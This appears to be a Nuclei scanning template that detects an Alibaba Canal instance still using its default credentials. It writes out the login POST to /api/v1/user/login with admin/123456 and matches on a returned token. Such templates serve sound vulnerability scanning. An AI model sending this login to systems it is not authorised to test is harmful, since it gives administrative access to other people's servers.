id: canal-default-login info: name: Alibaba Canal Default Login author: pdteam severity: high description: An Alibaba Canal default login was discovered. reference: - https://github.com/alibaba/canal/wiki/ClientAdapter classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 metadata: max-request: 1 tags: canal,alibaba,default-login http: - raw: - | POST /api/v1/user/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"username":"{{user}}","password":"{{pass}}"} attack: pitchfork payloads: user: - admin pass: - 123456 matchers-condition: and matchers: - type: status status: - 200 - type: word condition: and words: - 'data":{"token"' - '"code":20000' # digest: 4a0a00473045022100dcf09580a68dde8267efb45c71a519054938eaa0f8389934c19a69f945ecbd73022010071bf196c1b070ee79de3c48c4227e6834381e641b486b2059ace96d8257d7:922c64590222798bb761d5b6d8e72950